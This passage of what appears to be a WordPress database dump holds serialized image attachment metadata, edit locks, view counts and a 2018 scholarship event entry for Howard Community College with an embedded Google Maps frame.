\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:18:\"degree-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:25:\"Getty Images/Image Source\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:27:\"Student graduation ceremony\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:16:\"(c) Image Source\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:8:\"71916750\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3284,812,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:1000;s:4:\"file\";s:37:\"2016/12/DSCF49776_pps-by-Madisons.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"DSCF49776_pps-by-Madisons-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"DSCF49776_pps-by-Madisons-210x300.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:37:\"DSCF49776_pps-by-Madisons-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:37:\"DSCF49776_pps-by-Madisons-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:37:\"DSCF49776_pps-by-Madisons-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:37:\"DSCF49776_pps-by-Madisons-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:37:\"DSCF49776_pps-by-Madisons-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:37:\"DSCF49776_pps-by-Madisons-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:37:\"DSCF49776_pps-by-Madisons-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:13:\"FinePix S5Pro\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1483987753\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"78\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:7:\"0.00625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(5171,1298,'_yoast_wpseo_linkdex','32'),(5172,1309,'_edit_lock','1579404573:6'),(5173,1309,'_edit_last','1'),(5174,1309,'ts_template','a:0:{}'),(5175,1309,'_thumbnail_id','1299'),(5176,1309,'event','a:13:{s:3:\"day\";s:10:\"2018-11-01\";s:10:\"start-time\";s:7:\"7:00 PM\";s:8:\"end-time\";s:7:\"8:00 PM\";s:19:\"event-enable-repeat\";s:1:\"n\";s:9:\"event-end\";s:10:\"2018-11-01\";s:12:\"event-repeat\";s:1:\"1\";s:5:\"theme\";s:0:\"\";s:6:\"person\";s:25:\"scholarships@zphiblgz.org\";s:3:\"map\";s:361:\"<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3091.270928536212!2d-76.88161498492022!3d39.21401213582447!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x89b7df0c122c5409%3A0x1efe22dcab74062b!2sHoward+Community+College!5e0!3m2!1sen!2sus!4v1536985212346\" width=\"600\" height=\"450\" frameborder=\"0\" style=\"border:0\" allowfullscreen></iframe>\";s:9:\"free-paid\";s:4:\"free\";s:10:\"ticket-url\";s:0:\"\";s:5:\"price\";s:0:\"\";s:5:\"venue\";s:74:\"Howard Community College - Columbia, MD (Health Science Building Room 163)\";}'),(5182,1309,'page_settings',NULL),(5183,1309,'post_settings',NULL),(5184,247,'_rawhtml_settings','0,0,0,0'),(5190,1313,'_edit_last','1'),(5189,1313,'_edit_lock','1632327983:1'),(3967,567,'ts_article_views','507'),(3375,835,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:768;s:6:\"height\";i:1024;s:4:\"file\";s:21:\"2017/01/ZetaHouse.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"ZetaHouse-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"ZetaHouse-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"ZetaHouse-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"ZetaHouse-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:21:\"ZetaHouse-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:21:\"ZetaHouse-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:21:\"ZetaHouse-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:21:\"ZetaHouse-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"ZetaHouse-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:21:\"ZetaHouse-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:21:\"ZetaHouse-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3374,835,'_wp_attached_file','2017/01/ZetaHouse.jpg'),(3376,836,'_wp_attached_file','2017/01/Contribute-Now.png'),(3377,836,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:500;s:6:\"height\";i:250;s:4:\"file\";s:26:\"2017/01/Contribute-Now.png\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Contribute-Now-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Contribute-Now-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:26:\"Contribute-Now-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:26:\"Contribute-Now-450x250.png\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:26:\"Contribute-Now-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"Contribute-Now-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:26:\"Contribute-Now-300x250.png\";s:5:\"width\";i:300;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3378,837,'_wp_attached_file','2017/01/Contribute-Now-1.png'),(3379,837,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:500;s:6:\"height\";i:250;s:4:\"file\";s:28:\"2017/01/Contribute-Now-1.png\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"Contribute-Now-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"Contribute-Now-1-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:28:\"Contribute-Now-1-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:28:\"Contribute-Now-1-450x250.png\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:28:\"Contribute-Now-1-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:28:\"Contribute-Now-1-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:28:\"Contribute-Now-1-300x250.png\";s:5:\"width\";i:300;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3404,844,'_wp_attached_file','2016/12/FinalZENLogo.png'),(3405,844,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:425;s:6:\"height\";i:447;s:4:\"file\";s:24:\"2016/12/FinalZENLogo.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"FinalZENLogo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"FinalZENLogo-285x300.png\";s:5:\"width\";i:285;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:24:\"FinalZENLogo-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:24:\"FinalZENLogo-425x300.png\";s:5:\"width\";i:425;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:24:\"FinalZENLogo-425x300.png\";s:5:\"width\";i:425;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:24:\"FinalZENLogo-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:24:\"FinalZENLogo-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:24:\"FinalZENLogo-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3696,936,'_wp_attached_file','2017/01/IMG_0845-e1484547852506.jpg'),(3588,902,'_wp_attachment_backup_sizes','a:12:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:1836;s:6:\"height\";i:3264;s:4:\"file\";s:18:\"LilletWilliams.jpg\";}s:14:\"thumbnail-orig\";a:4:{s:4:\"file\";s:26:\"LilletWilliams-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"medium-orig\";a:4:{s:4:\"file\";s:26:\"LilletWilliams-169x300.jpg\";s:5:\"width\";i:169;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"medium_large-orig\";a:4:{s:4:\"file\";s:27:\"LilletWilliams-768x1365.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1365;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"large-orig\";a:4:{s:4:\"file\";s:27:\"LilletWilliams-576x1024.jpg\";s:5:\"width\";i:576;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"post-thumbnail-orig\";a:4:{s:4:\"file\";s:26:\"LilletWilliams-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"grid-orig\";a:4:{s:4:\"file\";s:26:\"LilletWilliams-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"list-orig\";a:4:{s:4:\"file\";s:26:\"LilletWilliams-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"thumb-orig\";a:4:{s:4:\"file\";s:26:\"LilletWilliams-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"shop_thumbnail-orig\";a:4:{s:4:\"file\";s:26:\"LilletWilliams-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"shop_catalog-orig\";a:4:{s:4:\"file\";s:26:\"LilletWilliams-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"shop_single-orig\";a:4:{s:4:\"file\";s:26:\"LilletWilliams-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}}'),(3586,902,'_wp_attached_file','2017/01/LilletWilliams-e1484452574788.jpg'),(3587,902,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1836;s:6:\"height\";i:2660;s:4:\"file\";s:41:\"2017/01/LilletWilliams-e1484452574788.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:41:\"LilletWilliams-e1484452574788-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:41:\"LilletWilliams-e1484452574788-207x300.jpg\";s:5:\"width\";i:207;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:42:\"LilletWilliams-e1484452574788-768x1113.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1113;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:42:\"LilletWilliams-e1484452574788-707x1024.jpg\";s:5:\"width\";i:707;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:41:\"LilletWilliams-e1484452574788-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:41:\"LilletWilliams-e1484452574788-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:41:\"LilletWilliams-e1484452574788-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:41:\"LilletWilliams-e1484452574788-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:41:\"LilletWilliams-e1484452574788-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:41:\"LilletWilliams-e1484452574788-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:41:\"LilletWilliams-e1484452574788-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:5:\"VS987\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1476650269\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"2.6\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:17:\"0.083333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(3592,904,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1620;s:6:\"height\";i:1748;s:4:\"file\";s:21:\"2017/01/1FinalDP1.png\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"1FinalDP1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"1FinalDP1-278x300.png\";s:5:\"width\";i:278;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"1FinalDP1-768x829.png\";s:5:\"width\";i:768;s:6:\"height\";i:829;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"1FinalDP1-949x1024.png\";s:5:\"width\";i:949;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:21:\"1FinalDP1-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:21:\"1FinalDP1-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:21:\"1FinalDP1-680x300.png\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:21:\"1FinalDP1-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"1FinalDP1-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:21:\"1FinalDP1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:21:\"1FinalDP1-600x600.png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3591,904,'_wp_attached_file','2017/01/1FinalDP1.png'),(3593,905,'_wp_attached_file','2016/12/AmicetteFlyer.jpg'),(3594,905,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:480;s:6:\"height\";i:672;s:4:\"file\";s:25:\"2016/12/AmicetteFlyer.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"AmicetteFlyer-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"AmicetteFlyer-214x300.jpg\";s:5:\"width\";i:214;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:25:\"AmicetteFlyer-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:25:\"AmicetteFlyer-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:25:\"AmicetteFlyer-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:25:\"AmicetteFlyer-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"AmicetteFlyer-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:25:\"AmicetteFlyer-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"AmicetteFlyer-480x600.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3599,908,'_wp_attached_file','2017/01/Breakfast-On-The-Go.png'),(3600,908,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1588;s:6:\"height\";i:2246;s:4:\"file\";s:31:\"2017/01/Breakfast-On-The-Go.png\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"Breakfast-On-The-Go-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"Breakfast-On-The-Go-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"Breakfast-On-The-Go-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"Breakfast-On-The-Go-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:31:\"Breakfast-On-The-Go-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:31:\"Breakfast-On-The-Go-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:31:\"Breakfast-On-The-Go-680x300.png\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:31:\"Breakfast-On-The-Go-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"Breakfast-On-The-Go-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:31:\"Breakfast-On-The-Go-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:31:\"Breakfast-On-The-Go-600x600.png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3970,576,'ts_article_views','1110'),(3618,918,'_wp_attached_file','2017/01/CWLogo2.png'),(3616,917,'_wp_attached_file','2017/01/Wegmans.png'),(3617,917,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:19:\"2017/01/Wegmans.png\";s:5:\"sizes\";a:10:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"Wegmans-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"Wegmans-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9